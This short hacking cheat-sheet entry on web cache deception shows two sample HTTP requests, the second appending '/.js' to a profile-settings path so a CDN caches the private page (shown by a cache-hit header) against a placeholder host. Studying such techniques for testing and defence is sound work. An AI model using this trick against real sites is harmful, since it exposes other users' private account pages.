Web Cache Deception
How to exploit
GET /profile/setting HTTP/1.1
Host: www.vuln.comHTTP/2 200 OK
Content-Type: text/html
Cf-Cache-Status: HIT
...GET /profile/setting/.js HTTP/1.1
Host: www.vuln.comHTTP/2 200 OK
Content-Type: text/html
Cf-Cache-Status: HIT
...Last updated